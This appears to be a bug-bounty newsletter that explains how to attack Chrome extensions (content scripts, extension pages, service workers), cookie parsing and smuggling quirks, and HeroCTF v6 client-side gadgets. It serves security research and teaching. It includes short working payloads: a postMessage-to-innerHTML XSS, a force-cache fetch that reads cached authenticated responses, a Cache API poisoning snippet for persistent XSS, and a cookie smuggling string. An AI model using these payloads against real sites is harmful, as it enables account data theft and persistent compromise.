[HackerNotes Ep.95 & Ep.96] Cookies, Caching & Attacking Chrome Extensions with MatanBer
We've got a HUGE double whammy HackerNotes. How to attack Chrome Extensions, understanding the extension threat model and diving deep into extension components. Then we finish off with a bunch of cool cookie parsing behaviours along with some clientside gadgets from the HeroV6 CTF writeup by Kevin Mizu.
Hacker TLDR;
Browser Extensions 101: The TLDR version of the components of an extension:
Content Scripts: Inject code into web pages to interact with the DOM.
Service Workers: Background scripts managing the extension's functionality.
Extension Pages: Internal pages like options or popups, not directly accessible from sites.
Manifest File: The manifest.json configures how and where the extension operates.
Gaining access to extension source code: You can grab the extension source code by swapping out the extension ID on this API call:
https://clients2.google.com/service/update2/crx?response=redirect&prodversion=9999&acceptformat=crx2,crx3&x=id%3D[extension_ID]%26uc
Extension Scoping: Check the manifest.json file for the matches key. This defines where the extension is ‘scoped’ and where it will run.
Attacking Content Scripts: Content scripts can be attacked from two perspectives: from attacker-controlled pages or from legitimate pages. From an attacker-controlled page, you can perform:
Direct DOM Injection: When a content script injects UI elements directly into the DOM, it creates multiple vulnerabilities:
The attacker’s code on the page can access and read any content within the injected UI elements.
Attackers can also manipulate these elements by dispatching events, allowing them to simulate clicks, scrolls, or other user actions on these injected components.
Closed Shadow DOM Injection: If the UI is rendered within a closed shadow DOM, it provides a layer of isolation, but risks remain:
The shadow DOM prevents direct access by the attacker’s scripts, but techniques like CSS injection can still be used to leak content. Additionally, attackers can employ clickjacking, overlaying elements to trick users into interacting with the shadow DOM UI without realizing it.
Clickjacking remains possible in most scenarios, where the attacker overlays the UI and deceives users into interacting with it unintentionally.
From a legitimate page: the content script has access to the regular browser APIs, making it susceptible to standard client-side attack methods. Standard checks like postMessage listeners and universal input sources (hash fragments, query params) - all of your standard attack surfaces are the go-to here. More on this below.
Attacking Extension Pages: Extension pages are not directly accessible from regular websites and have to be attacked through a content script or service worker, although misconfigurations in web_accessible_resources can expose internal pages.
Attacking Service Workers: You don’t have a direct line to a service worker from an attacker’s perspective; instead, you have to pivot through an extension page or an attacker-controlled page unless there’s a misconfiguration:
Service workers use message-passing APIs (chrome.runtime.onConnect, chrome.runtime.onMessage) to communicate. External connections (chrome.runtime.onConnectExternal) can be misused if misconfigured.
Check the manifest for externally_connectable settings that might increase the attack surface and perspective of the service worker.
Debugging extensions: To dynamically debug extensions, go to the DevTools settings (gear in the top-right corner) → Preferences → Sources → enable ‘Search in anonymous and content scripts’. Then, under Ignore List, disable ‘Content scripts injected by extensions’. Now the Sources panel has a ‘Content scripts’ section that lets you debug content scripts, and you can select the extension you want to debug.
Debugging service workers: about:inspect → Service workers → Inspect
Heroctf-v6 Writeups: Kevin Mizu dropped some writeups from the HeroCTF, packed with cool clientside gadgets. We’ve got cache API and service worker research for you: https://mizu.re/post/heroctf-v6-writeups
We’ve got so much more below but we simply can’t fit it all in. Check it out below!
Remote workforces are a ticking time bomb!
Hybrid and remote work expand your company's surface area of attack beyond corporate firewall boundaries. Employees’ personal computers introduce shadow IT, and home networks with default settings are easy targets, compounded by public Wi-Fi vulnerabilities.
You need to develop a strategy to stay secure while remote employees work across untrusted networks.
To learn how you can secure your company's workforce, get a free copy of the latest ThreatLocker® whitepaper on how to secure remote workforces.
Learn More About the ThreatLocker® Cyber Health Report Here
Browser Extensions 101
Browser extensions are mostly used to add extra features to websites or even to the browser itself. Think of them like little helpers that customize your browsing experience—whether it’s blocking ads, saving passwords, or changing how a page looks.
To do this, extensions need a way to run their own code on the sites they’re enhancing. Plus, they need something to coordinate this process. A good common example is AdBlock; it’s a browser extension that works across tons of sites to block annoying ads.
Extensions usually handle this through content scripts. These scripts inject the extension’s code into the web pages it’s targeting, and they’re managed by a configuration file (a JSON file) that lists the content scripts and the sites they’ll be active on.
There are also different versions of manifest files, which control how extensions interact with the browser. Some older versions are being phased out to simplify and standardize things, with Manifest v3 being the latest version.
In its simplest form, a browser extension is just a bundle of files that includes:
Some JavaScript files to handle different functions.
A bunch of other files like HTML, images, and fonts.
A manifest file, which is basically a big JSON config file telling the extension what to do.
All these files work together to make the extension run on certain sites and access what it needs in your browser:
Browser extension breakdown from https://spaceraccoon.dev/universal-code-execution-browser-extensions/
To do so, the browser extension uses a few components, which communicate with one another via messages (using the message passing API):
Service worker: This is the "brain" of the extension, running quietly in the background, separate from any tabs or windows. It’s the most powerful part of the extension, with access to all the browser features (think of these as tools and functions the extension can use, like saving files or reading web pages). In our example extension, SaveMyJPEGs, the service worker would handle the communication with the example savemyjpegs.com site. It’s like the go-between that coordinates all the action with the content scripts below.
Extension pages: These are web pages hosted by the extension itself and can run JavaScript like any regular web page. They’re things like the extension’s popup and settings page. Unlike regular pages on the web, these can access some browser APIs but aren’t directly accessible from other websites, meaning you can’t just open them or interact with them from a normal site.
Content scripts: These are JavaScript scripts that the extension injects into the pages it wants to work with. For SaveMyJPEGs, a content script could add a "Save" button to every image on a page. It scans for img tags and puts that button next to each one, making it easy for users to save images directly.
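To make those moving parts concrete, here's a minimal, hypothetical manifest.json for the SaveMyJPEGs example wiring the three components together; the file names are made up for illustration:

{
  "manifest_version": 3,
  "name": "SaveMyJPEGs",
  "version": "1.0",
  "background": {
    "service_worker": "background.js"
  },
  "action": {
    "default_popup": "popup.html"
  },
  "content_scripts": [
    {
      "js": ["content.js"],
      "matches": ["https://*/*"]
    }
  ]
}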
If you’d like some really good reading before we go any further into browser extensions, check out Spaceraccoon’s writeup here: https://spaceraccoon.dev/universal-code-execution-browser-extensions/ - it’s probably one of the best writeups around browser extension hacking.
To keep things safe, browser extensions run content scripts in what's called an "isolated world." This means the content script can still run on the specified pages, but the page itself can’t mess with the extension's code.
Here’s where it gets interesting: even though the content script runs on the page, it still has full access to the DOM and can interact with everything as needed. However, the page’s code can’t interfere with the extension. So, let’s say a page tries to change something globally, like window.alert: the page can overwrite it for itself, but the extension’s "isolated world" (yeah, sounds funny, I know) stays completely separate and unaffected.
The isolated world is there to protect the content script from a sketchy page messing with it. But sometimes, extensions need to run JavaScript directly in the page’s actual context (outside the isolated world). In these cases, only certain things are shared between the two worlds, like the DOM and a few global variables, such as history.state.
One way to run code in the page’s context is by adding an actual <script> element to the DOM (DOMLogger++ does this), or you can use some native options through Chrome’s APIs.
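As a rough sketch of that first option (assuming a content script bundled with a hypothetical extension), escaping the isolated world can look like this; note the page's own CSP can still block inline scripts like this one:

// content.js (isolated world): add a <script> element so its code runs in the page's main world
const s = document.createElement("script");
s.textContent = `console.log("main world alert is:", window.alert);`;
document.documentElement.appendChild(s); // executes immediately in the page context
s.remove(); // the element is no longer needed once it has run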
Here’s an important security note: in every attack scenario, it’s impossible to get JavaScript to execute in the extension’s origin. Manifest v3 requires a strict Content Security Policy (CSP) that blocks any outside scripts except the ones bundled with the extension. That doesn’t mean attackers can’t do some serious damage, though; there’s still potential for big impact!
Extension Scoping
So, how do extensions know where and when to run? This question is answered in the manifest.json file. Looking at the manifest, we can see a matches array, which looks something like this:
"content_scripts": [
{
"js": [
"js/jquery-3.2.1.min.js",
"js/contentscript.js",
],
"matches": [
"http://*/*",
"https://*/*"
],
"all_frames": true
}
You can set "<all_urls>" in an extension’s matches to make it run on any page across the web. Here’s where it gets interesting: if you find an XSS vulnerability on a site the extension is set to run on, you can potentially turn that into an attacker-controlled site, which really broadens the threat landscape, but more on this shortly.
Some extensions even have permission to access cookies from other sites, which opens up more options. So, if we manage to XSS a subdomain the extension interacts with, we could use that as a way to attack the extension itself.
But it gets a bit more complex than that. Service workers can also inject content scripts into specific tabs through the chrome.tabs API. (Here’s more on that if you’re curious: the chrome.tabs API documentation.)
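As a rough Manifest v3 sketch of programmatic injection (assuming the extension holds the "scripting" permission plus host permissions for the tab's URL; the file name is illustrative), the actual injection call lives in chrome.scripting:

// service worker: inject a content script file into the currently active tab on demand
chrome.tabs.query({ active: true, currentWindow: true }, (tabs) => {
  chrome.scripting.executeScript({
    target: { tabId: tabs[0].id },
    files: ["js/contentscript.js"]
  });
});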
It’s important to fully understand your code base when reviewing an extension to be able to detect and understand these nuances, otherwise an exploitation opportunity could easily be missed.
Chrome Extension Threat Model
Attacking Content Scripts
From an attacker-controlled page:
If an extension tries to interact with a malicious page using a content script, it can unintentionally create vulnerabilities. Although Chrome provides an "isolated world" to separate extension code from page code, attack vectors still exist.
Because extensions and the page share the same DOM, the page’s JavaScript can still interact with elements injected by the extension. This means that an attacker’s code could potentially manipulate elements created by the extension, such as triggering button clicks or reading any content the extension has added.
These shared DOM interactions open up nonstandard attack surfaces, allowing attackers to exploit the extension’s functionality indirectly.
Furthermore, events in the DOM have a special property called isTrusted, which indicates if the event was initiated by a genuine user action. For click events, isTrusted is only set to true if the user directly performed the action, such as by clicking a button themselves.
This property acts as a defence against scripted attacks, where malicious code tries to simulate user actions. If an attacker uses JavaScript to trigger a click, isTrusted will be false, helping to identify it as non-authentic. This isn’t foolproof though; as we all know, in some cases it’s quite easy to harvest a valid click from a user.
Shadow DOM
Extensions can also use a closed shadow DOM, a method for isolating content within the webpage. A shadow DOM is like a mini-document inside the main document, creating a separate scope that limits what JavaScript can access or modify.
When an extension injects an element as a closed shadow DOM, it’s inaccessible to other scripts on the page. For instance, if function A creates and injects an element into a closed shadow DOM, function B won’t be able to access or alter it directly.
Think of the closed shadow DOM as scoping on roids within the DOM. It provides a secure boundary around the extension’s elements, preventing unwanted interference and helping to maintain control over the injected content.
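A small sketch of how a content script might set this up (the element names are illustrative):

// content script: render the extension UI inside a closed shadow root
const host = document.createElement("div");
const shadow = host.attachShadow({ mode: "closed" }); // host.shadowRoot is null for page scripts
shadow.innerHTML = `<button id="save">Save image</button>`;
document.body.appendChild(host);
// only this content script keeps a reference to `shadow`, so the page can't reach inside it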
It might sound safe, but you can still mess with the styles the shadow DOM uses and also clickjack it by overlaying elements on it. Equally, Masato Kinugawa did some pretty cool research with font ligatures which allows you to exfiltrate content from a shadow DOM through CSS vectors.
So we have a few layers to this specific threat model:
Direct DOM Injection: When a content script injects UI elements directly into the DOM, it creates multiple vulnerabilities:
The attacker’s code on the page can access and read any content within the injected UI elements.
Attackers can also manipulate these elements by dispatching events, allowing them to simulate clicks, scrolls, or other user actions on these injected components.
Closed Shadow DOM Injection: If the UI is rendered within a closed shadow DOM, it provides a layer of isolation, but risks remain:
The shadow DOM prevents direct access by the attacker’s scripts, but techniques like Masato’s CSS exfiltration can still be used to leak content.
Additionally, attackers can employ clickjacking, overlaying elements to trick users into interacting with the shadow DOM UI without realizing it.
iframe Injection: Rendering the UI within an iframe adds a stronger layer of security, limiting content access:
The iframe generally prevents the attacker’s script from reading or manipulating the UI’s content directly.
However, clickjacking remains possible, where the attacker overlays the UI and deceives users into interacting with it unintentionally.
From a legitimate page:
When a content script is embedded in a legitimate page, attacking it can resemble attacking any other standard web page. The “universal malicious input sources,” such as query parameters and postMessage, operate similarly and can be exploited in comparable ways.
This is because the content script has access to the regular browser APIs, making it susceptible to standard client-side attack methods. Here are a few things to watch for on a legitimate page:
postMessage Listeners: Look out for any postMessage listeners the page might use. If any listeners are already set up, they may provide an entry point for injection or manipulation (see the sketch after this list).
In some cases, you may need to trigger an action on the page to activate or register a postMessage listener. Without this, the listener might not initially appear as active, making it necessary to interact with the page first.
Universal Input Sources: These include common entry points such as query parameters, location sources, hash values, and other dynamic elements.
By manipulating these universal sources, attackers can pass malicious data to the page.
Standard client-side attack techniques, like injecting harmful data into query parameters or manipulating URL fragments, are relevant here.
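For illustration, here's a hypothetical vulnerable listener registered by a content script, plus how an attacker-controlled page might hit it; the message shape and the sink are made up:

// content script (hypothetical): trusts postMessage data without checking event.origin
window.addEventListener("message", (event) => {
  if (event.data && event.data.type === "render") {
    document.querySelector("#ext-panel").innerHTML = event.data.html; // classic innerHTML sink
  }
});

// attacker-controlled page: nothing validates the sender, so any script can post the payload
window.postMessage({ type: "render", html: "<img src=x onerror=alert(document.domain)>" }, "*");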
Attacking Extension Pages
Extension pages are static assets defined within the extension, and they are accessed using the chrome-extension://{ID} URL scheme. These pages can be thought of as regular web pages but with a strict Content Security Policy (CSP) and additional permissions.
Extension pages can communicate with the background script, which, from an attacker's perspective, provides another potential vector for pivoting. This could be done either through the extension page or via the content script. However, extension pages are not accessible from regular websites — they cannot be loaded in an iframe, referenced by a location, or accessed directly. As a result, accessing these pages can be somewhat complex.
The extension's manifest file includes a key called web_accessible_resources, which defines patterns for which files are accessible to regular websites. This could allow either all websites or only specific, trusted origins to access certain extension resources.
However, it does not apply to the extension's internal pages: pages like the popup or options page cannot be directly accessed by regular websites. These are isolated to the extension's environment and can only be interacted with via the extension's own functionality, such as from a background script or a content script.
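In Manifest v3 the key looks something like this (the resource paths and match patterns are illustrative); anything listed here can be loaded by matching sites via the chrome-extension://{ID}/ scheme:

"web_accessible_resources": [
  {
    "resources": ["pages/pageA.html", "img/*.png"],
    "matches": ["https://*/*"]
  }
]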
What’s interesting is that if you have pageA which is accessible but pageB which is not, and you can iframe pageA and redirect it to pageB, you will be able to get a reference to pageB. This is similar to the technique used in a bug on MetaMask, resulting in a $120k clickjacking bounty.
Reference: https://medium.com/metamask/metamask-awards-bug-bounty-for-clickjacking-vulnerability-9f53618e3c3a
This is an example of what the MetaMask web_accessible_resources looked like:
Usually, a malicious website will not be able to interact with extension pages whatsoever. This means the malicious website isn’t allowed to iframe, open, or even redirect to an extension page. As you probably guessed, there are a few ways around this limitation:
If pageA is web_accessible, and you can make it redirect to pageB somehow, then you can access pageB (an otherwise protected resource).
In the context of MetaMask, MetaMask had a specific page used for displaying phishing warnings. This page contained some text along with a hyperlink, and the hyperlink was dynamically linked to the value of a URL parameter. This page was accessible by any origin, meaning it could be loaded on any website without restriction.
MetaMask also had another page — a notification page — which displayed a button that allowed users to accept a pending transaction. This page was designed to prompt users for approval when interacting with Ethereum transactions.
The attack scenario played out as follows: an attacker would first open the phishing notification page in MetaMask, which would typically display a warning to the user. The attacker would then manipulate the URL of the phishing warning page by injecting the URL of the sensitive page (such as the transaction confirmation page). When the victim clicked on the phishing link, the phishing warning page would redirect the user to the transaction confirmation page, which normally wasn’t web-accessible or easily reachable by a regular user.
However, because of the way MetaMask handled the page redirects, it allowed the attacker to "clickjack" the victim. This means the attacker could overlay an invisible iframe or button on top of the legitimate MetaMask confirmation interface. The victim, unaware, would think they were interacting with the phishing page, but in reality, they were clicking on the hidden transaction approval button, which led to unintended actions, like approving a malicious transaction.
This vulnerability earned a bounty to the tune of $120,000, as the researcher was able to demonstrate that victims could be tricked into unknowingly signing malicious transactions by abusing the combination of the redirect, phishing warnings, and clickjacking techniques.
Gregxsunday dropped a repo and a video on this one which was used to piece together the above, give it a read here: https://github.com/gregxsunday/metamask-clickjacking
Tip: If some page isn’t web_accessible, you can still get a window handle to it if you manage to get a malicious site into the same tab where the inaccessible page was once opened, by iteratively using history.back().
Some other things to think about around extensions are authentication and how it’s implemented. If authentication occurs and the extension has to send authenticated requests, can you combine gadgets to send those authenticated requests elsewhere?
There might be quite a rich attack surface there in itself that’s worth exploring.
Attacking Service Workers
So, service workers. When trying to attack a service worker you don’t have a direct line to them from an attacker’s perspective; instead, you have to pivot through an extension page or an attacker-controlled page.
When a content script connects to the service worker, you have the equivalent of a message listener for the communication. It looks something like chrome.runtime.onConnect or chrome.runtime.onMessage: you call this with a callback function as a parameter, and when the service worker gets a message it will call the onMessage listener.
When calling this, it will give you back a Port object that you can use to communicate back with the extension.
In Chrome, message ports are part of the messaging system used to communicate between different parts of an extension (like background scripts, content scripts, and popup scripts). A MessagePort object allows two-way communication between these scripts.
When a message channel is created, it comes with two ports—one for each side of the connection. Each port can send and receive messages, making it easy to send data back and forth. This is especially useful when you need real-time updates or persistent communication between parts of an extension.
There’s also a way to do this natively with Chrome extensions via chrome.runtime.connect. Its process can be broken down into:
Establish the Connection: A script calls chrome.runtime.connect, which returns a Port object.
Send Messages: Use port.postMessage() to send messages across this connection.
Listen for Messages: Set up an event listener with port.onMessage.addListener to respond when messages are received.
Close the Connection: The connection stays open until either side disconnects or explicitly calls port.disconnect().
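Put together, a minimal sketch of that flow might look like this; the port name and message shapes are made up:

// content script or extension page: open a long-lived connection to the service worker
const port = chrome.runtime.connect({ name: "sync" });
port.onMessage.addListener((msg) => console.log("from service worker:", msg));
port.postMessage({ action: "ping" });

// service worker: accept the connection and reply over the same Port
chrome.runtime.onConnect.addListener((port) => {
  port.onMessage.addListener((msg) => {
    if (msg.action === "ping") port.postMessage({ action: "pong" });
  });
});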
The external versions of these - chrome.runtime.connect(extensionId) on the caller side and chrome.runtime.onConnectExternal on the receiving side - allow other extensions to connect, as long as the target extension explicitly allows it. The breakdown of this:
Setting Permissions: The extension that wants to allow external connections must list the other extension's ID in its manifest under "externally_connectable". This might look like: "externally_connectable": { "ids": ["<other_extension_id>"] }
Initiating the Connection: The extension that wants to connect externally calls chrome.runtime.connect(extensionId), where extensionId is the ID of the target extension. This establishes a Port object to communicate over.
Listening on the Target Extension: The receiving extension sets up a listener for external connections using chrome.runtime.onConnectExternal.addListener, which will fire whenever an external connection request is received. The listener receives a Port object, which enables two-way communication.
Sending and Receiving Messages: Both extensions can use port.postMessage() to send messages and port.onMessage.addListener to receive them, just like with internal connections.
Closing the Connection: Either side can close the connection by calling port.disconnect().
It’s worth noting that extension pages can actually listen for external messages too, not just service workers.
These APIs will only exist on origins that are allowed by externally_connectable. So you either go to an externally connectable page and connect from there, or, if this config doesn’t exist, the attack path would be to get a user to install a malicious browser extension and privilege-escalate from that context.
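If a regular web page's origin is listed under the matches form of externally_connectable, that page gets a limited chrome.runtime and can message the extension directly. A rough sketch, with the extension ID and message shape made up:

// on an allowed web page: chrome.runtime.sendMessage(extensionId, ...) is exposed
const EXTENSION_ID = "abcdefghijklmnopabcdefghijklmnop"; // hypothetical target extension ID
chrome.runtime.sendMessage(EXTENSION_ID, { action: "getConfig" }, (response) => {
  console.log("extension replied:", response);
});

// in the target extension's service worker: handle messages coming from allowed web pages
chrome.runtime.onMessageExternal.addListener((msg, sender, sendResponse) => {
  sendResponse({ ok: true, from: sender.url });
});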
Gaining Access to Source Code
All great talk about mapping out attack vectors and understanding the inner workings, but how do we actually figure out if any of this is applicable? For that, we have to jump into the source.
Unfortunately, most of the extension’s code will be minified. The file that Chrome grabs for installation and actually installs is called a crx file. This .crx file contains the entire extension contents and it can be unzipped and examined, kind of like an apk file.
You can grab the crx files directly from the web store if you use the webstore API. To do this with wget you’ll need the extension ID and the following endpoint:
https://clients2.google.com/service/update2/crx?response=redirect&prodversion=9999&acceptformat=crx2,crx3&x=id%3D[extension_ID]%26uc
Unfortunately, this endpoint only returns the current version of the crx; there isn’t a way to check prior versions, so it might be worth downloading your target extension every X days and diffing it for changes.
Once you've enabled developer mode in chrome://extensions, you’ll be able to see each extension’s unique ID listed alongside it. This ID corresponds to the folder name where the extension's files are stored, making it easy to locate the exact directory. By matching this ID with the folder in your browser profile path, you can directly access the extension’s files for any further configuration or inspection.
This method is especially helpful if you're managing multiple extensions and need to troubleshoot or modify one specifically.
Debugging
To dynamically debug extensions, go to the DevTools settings (gear in the top-right corner) → Preferences → Sources → enable ‘Search in anonymous and content scripts’. Then, under Ignore List, disable ‘Content scripts injected by extensions’.
Now the Sources panel has a ‘Content scripts’ section which allows you to debug content scripts, and you can select the extension you want to debug.
Debugging service workers
If you want to debug the service worker, browse to about:inspect and you’ll find a section for service workers. On the left-hand side, you can see all the service workers and inspect them. Service workers get loaded and unloaded as they’re needed, so they might not always show.
There are other concepts like offscreen pages that exist in extensions which have extensive documentation which may be worth checking out!
That’s enough extension hacking. Let’s jump into some other stuff.
Different stacks parse cookies differently. There are a lot of situations where cookies are parsed differently by the browser and by backend frameworks, which results in a lot of room to manoeuvre in certain contexts.
With cookie injection, you sometimes have cookie attribute injection, where you can only inject attributes, ie:
Request: /set_preference?preference=dark; Secure; HttpOnly
Response: Set-Cookie: preference=dark; Secure; HttpOnly; Secure; HttpOnly
That would be a (not very useful) case of injecting additional attributes into a cookie.
Now, what the guys were talking about on the pod was related to cookie parsing logic. This preys on the differences in behaviour between the browser and various backend technologies when parsing cookies with certain characters. The general concept is: you can make a cookie value extend past the ; if you wrap it in double quotes (").
One of the examples the guys provided on the pod was: x="evilInjection;y=dontControl";smuggledCookie=anyvaluehere;
Which the server would parse as x="evilInjection;y=dontControl" AND smuggledCookie=anyvaluehere
Behaviour like this means we can trick the backend into parsing unintended attributes and in some cases, entirely new cookies.
There’s more. Some pretty cool research dropped by Ankur Sundara on cookie smuggling and injection - check it out here - also contains a bunch of useful tips, tricks and use cases.
It’s definitely worth a read and one to bookmark and come back to when you find yourself in one of these injection contexts: https://blog.ankursundara.com/cookie-bugs
Another thing to consider, if you start going down cookie parsing logic and clientside vectors in general, is that the discrepancy between browsers can be huge. Safari, for example, breaks its entire parsing logic when a } is set in a Set-Cookie header from a server, meaning you can comment out some of the attributes.
Another prime example: Safari has a globally accessible variable which is only accessible on Safari; no other browser. These kinds of behaviours are the things to consider when crafting PoCs, as they could be the difference between exploitable and unexploitable behaviour.
Behaviour like this is also the reason Shazzer by Gareth Heyes exists: https://shazzer.co.uk/
Tip: No Mac to test out Safari? ios-webkit-debug-proxy will connect to an iPhone and use the phone’s remote debugging capabilities, meaning you can test against the Safari browser without a Mac.
Heroctf-v6 writeups
Mizu is one of the few people I have tweet notifications on for, and when he dropped writeups for a CTF he recently did, I must admit I was intrigued. The writeups delivered as per usual: full of clientside gadgets and behaviours which seem insanely useful.
Let’s jump into some of them.
This one is a cool one. It starts with a finding from BitK back in 2019 - https://issues.chromium.org/issues/40095847 - whereby you can use the force-cache option of fetch to pull data out of the cache which you wouldn’t usually be able to access with a normal fetch request.
Chromium mitigated this with double-keyed cache partitioning - this cache takes three parameters to create the key: the top-level site, the frame’s site, and the resource URL.
If you’re familiar with CORS, you’ll know that if you see a server respond with Access-Control-Allow-Origin: * you won’t be able to send a credentialed request; the origin has to be specified. Taken from the blog, Mizu recognized that the initiator of the request is not considered -
‘..Therefore, something interesting about this in Chromium is that it doesn't take the initiator of the request when handling the cache. Why? Because if we fetch() a resource already loaded by an <img> on the same page using fetch(), it will be possible to load the response from the cache!’
Due to that behaviour, Mizu crafted a payload to issue an unauthenticated request but received an authenticated response from the cache:
<img src="http://cache-cache.heroctf.fr:5100/">
<script>
fetch("http://cache-cache.heroctf.fr:5100/", {
    method: "GET",
    cache: "force-cache"
}).then(d => d.text()).then((d) => {
    alert(d)
})
</script>
There are a few restrictions stated in the writeup for this to work:
The response must not start with { (CORB).
Response headers must not contain: Vary: Cookie, Cache-Control: no-store, or X-Content-Type-Options: nosniff.
For cross-site exploitation, cookies must be set to SameSite=None (Google Chrome) and the tracking policy deactivated (Chromium).
This could be exploitable on targets where SameSite=None is specified but you’re running into the Access-Control-Allow-Origin: * problem. Super cool.
The CTF unearthed a tonne of useful gadgets, and this one is no different. The cache API - https://developer.mozilla.org/en-US/docs/Web/API/Cache - used by service workers is exposed (accessible) on the window object.
Accessing the Cache API from window.
With this being accessible, depending on the context of the API used by the service worker, it’s possible to:
Create/poison pages on the website.
Poison existing responses (e.g., .js files).
Service workers are a pretty common implementation across targets too. This is how it was implemented in the CTF:
self.addEventListener("fetch", (event) => {
    event.respondWith(
        caches.match(event.request).then((res) => {
            if (res) {
                console.log(`Loading from the cache: ${event.request.url}.`);
                return res;
            }
            return fetch(event.request); // assumed network fallback; the original snippet was truncated here
        })
    );
});
What’s interesting about the cache API too is:
You can use this as a limited version of fetch.
The cache is shared with the whole origin.
It can be used to escalate XSS and make it persistent.
Can be a useful gadget if an app is storing session material in session storage and you can use the cache API to hit every tab to harvest it.
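As a sketch of why that last point is so dangerous: with JavaScript execution on the origin (e.g. via an XSS), you can write your own response into the cache the service worker reads from, so the payload survives reloads. The cache name and the target path below are assumptions:

// runs in the victim origin (e.g. via XSS): poison a cached script the service worker will serve
const evil = new Response('alert(document.domain); // persistent payload', {
  headers: { "Content-Type": "text/javascript" }
});
caches.open("v1").then((cache) => cache.put("/static/app.js", evil));
// the next load that hits caches.match() for /static/app.js gets the poisoned copy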
There are a ton of awesome write-ups from this CTF, and if you get the chance, I’d definitely recommend checking them out! You can dive into the details and pick up a bunch of cool techniques here: https://mizu.re/post/heroctf-v6-writeups
Well, that’s a wrap for this week! A double whammy HackerNotes.
Till next time!